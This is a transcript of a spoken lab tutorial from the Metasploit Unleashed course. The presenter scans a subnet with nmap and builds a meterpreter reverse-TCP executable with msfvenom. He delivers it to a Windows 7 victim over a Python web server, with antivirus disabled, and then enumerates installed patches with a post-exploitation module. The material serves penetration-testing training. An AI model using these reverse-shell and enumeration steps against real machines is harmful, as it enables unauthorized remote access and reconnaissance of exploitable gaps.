Now we're going to run the shell that we downloaded. And just like that, we have a Metasploit shell on our attacker box. Now we can do things such as sysinfo, get some information on the computer. We're going to background this now. We're going to use post windows gather enum patches. We're going to show options. We are in session 14, so we're going to do a set session 14, and we're going to run this. And just like that, we get a list of all of the patches that have been installed on this computer. What is up, everybody? Today we're going to be continuing the course called Metasploit Unleashed, offered up by Offensive Security. It's a free course that you can find at the website included below in the description if you want to follow along and read the article. Today we're going to be doing the next portion, which is Windows patch enumeration. Basically, we're going to get a reverse shell on the victim machine, which will be a Windows machine. So make sure that you have one running. I have a Windows 7 machine running right now. You can have a Windows 10 or a Windows Server machine, whatever you'd like, as long as Windows. And we're going to get a reverse shell. We're going to get Metasploit. We're going to use the post Windows gather enum patches, and we're going to get the patches and any potential vulnerabilities in that machine. So let's get started. Let's open up our nifty terminal. We're going to make this a little bigger by hitting Control+. We're going to get root, so let's type in sudo su. All right, so the first thing that we need to do is that we need to get our IP address. And to do so, we're going to type in if config. And we find our IP address right here at the top of the screen. Now we're going to do a quick nmap. By typing in nmap, we're going to paste our IP address, and we're going to delete the last 2 digits right before the period. And we're going to type in 0-/24. This is going to do a scan for within this subnet right here from 1 to 255. It's going to knock on every single door there, 1, 2, 3, all the way up to 255 to see what systems are there. And when it finds an alive host, it will print back the open ports. So let's do it. So we get back the results, and we see that we have a host that's alive at the address .12. Let's copy this. It seems to be our machine since ports 135, 139, and 445 are open. We know that these ports belong to a Windows machine, especially when they're all together, because 135 and 139 belong to NetBIOS, 445 belongs to SMB. We can also see 445 open on a Linux machine, but we wouldn't see 139 and 135 open. Besides that, we also see right here that it is Microsoft. If we want to do a further research on it, we can look for that IP address, and we can do a -O. And when you do a -O, it'll tell you what OS nmap believes it's running. So here it's telling us that it believes it is running a Microsoft Windows 7, 2008, or an 8.1. And actually, nmap gets it right this time, and we're running a Windows 7 machine. So let's clear our screen right now. We have the IP address of our victim machine now. So the next thing that we need to do is we need to create a connection between that machine and our machine. How do we do that? Well, first we can try to hack and see if there's any vulnerabilities on that machine. Try to execute some remote code. But because we have the machine running, and what we really want to do in this exercise is run the post module, what we're going to do is we're going to create a reverse shell from scratch. We're going to save it. We're going to stand up a Python web server, download it into the victim machine, run it, and get a connection back. So let's do it. So the first thing we need to do is create that payload. So we're going to type in msf venom -p windows/meterpreter reverse_TCP. The next portion is going to be now, this is going to tell, the -p tells it that, okay, I want a Meterpreter reverse TCP shell, and it has to be used for a Windows machine or a Windows target. The next portion of this payload will be that the lhost that it's going to call back to is the IP address of the attacker or our IP address. Then we're going to type in L port, and the L port is, okay, I want you to call back to this IP address to this port. So when we set up our listener right after this, we will set up our listener with the same parameters, our IP address and the same port. So let's finish typing this in. So L port is going to equal 12345. -A is for the architecture. We're going to select a -A, an x86 architecture, which just stands for a 32-bit. If it was a 64-bit, we would do an x64. The reason we're doing a 32-bit payload is because a 32-bit payload can work with a 64 architecture or a 32-bit architecture. So since we don't know the bits on the victim machine, we're going to play it safe and we're going to build a 32-bit payload. The next portion is the -F. This is the format of the payload. We want it to be an executable. We're going to pipe this into the win reverse shell.exe. That's going to be the name of the file. All right, so we get the final size of the exe file. The payload size is 354 bits. We can confirm that the file is there by typing in file and then the name of the file. We hit enter and notice that right here we confirm it. This is the name of the file and it is a PE, a 32-bit executable for MS Windows. Fantastic. Now our payload has been created within this specific directory. Notice that if we hit ls attack al, we will find our payload somewhere in here, right here. Okay? So now what we want to do is that we want to serve up this directory by standing up a simple Python web server. And the way we are going to do that is by typing Python -m simple HTTP server, and it's automatically by default going to serve it on port 8000. Fantastic. So now this is running. Let's open up a new tab. Let's get root. Now we're going to start up our listener by starting up MSF console or Metasploit. So we're going to type in MSF console -q. And to set up our listener, we're going to use the multi-handler. Show options. Notice that the payload by default is generic shell reverse TCP. We need a Windows Meterpreter reverse TCP. So let's set our payload to Windows Meterpreter reverse TCP. Show options. Now we have the right payload set up. Now what we have to put in is the lhost and the L port. So if you remember, for our MSF Venom, we utilized lhost was our IP address. So let's set lhost and our IP address. And for our L port, we said it would be 12345. Make sure that these match the payload that you create. If not, you will not get a signal back. Once all of that is ready, we can hit run, and our listener is ready and prepared, waiting for a connection back from any computer. So now we're going to go to our victim machine. We're going to open up the browser, and we want to navigate to the web server that we have stood up just earlier. So we're going to type in http:// and our IP address. colon, and then the port number, which is port 8000. And right now we're seeing the directory served up on the internet. We can go and download the WinReverse shell. Let's save this on our desktop. Make sure that you have no antivirus and Windows Defender disabled, because if not, your shell will be identified and quarantined. We can minimize this, and now we have a shell right here. What we can do is that we can stop the simple web server by hitting Control-C. If we go back to our machine and we refresh the page, notice that the server is down and can no longer be displayed. Fantastic. If we go back to the attacker machine and look at the multi-handler or the listener, we see that the listener is working here, waiting for a reverse TCP connection on our IP address and this port. So now we're going to double click, or we're going to execute the payload that we just downloaded. And bam, we get a Meterpreter session. So we can do things like get UID. So we are John. We can do sysinfo, and that tells us, okay, this is a Windows 7 machine. The computer's name is John PC. The architecture is in 64-bit. So a 64-bit payload would have worked on this computer. But notice that the 32-bit works just as fine. Here's a domain, etc., etc. So now the enum patches module is a post module, meaning that it is a post exploitation module. So this is the exploitation phase that we just did. So to utilize that module, we need to background our shell, meaning that we're just going to put this on the shelf, and we're going to use post/windows/gather/enum_patches. We're going to display the options, and all we need to do for this one is to set the session. Notice that this session right here is Meterpreter session 2. So we need to set the session to session 2. If we display the options, now we see that it is set, so now we can run it. And just like that, we have gotten a list of all of the patches that have been installed and the date that they have been installed on this computer. So this is very, very nifty. In certain occasions, what you will see is kind of like in the example here. They can also tell you the patches that are missing and what the computer can be possibly vulnerable to. Another thing you can do is that you can just grab one of these, you can copy it, and search for it in Google. And just really get an idea of the patch and what was being patched. And if you find the right place, you can check out, okay, what was the last patch installed on this computer, and are there any other patches that have come out since that have not been applied. And what that's going to tell you is, okay, if these patches have not been applied yet, then these vulnerabilities are still present on that machine. And that, my friends, is how you can use the post-Windows enum patches modules within MSF Console to enumerate the patches that are available, installed, pending, or even vulnerable within your target machine. I hope you enjoyed this. Until next time, bye.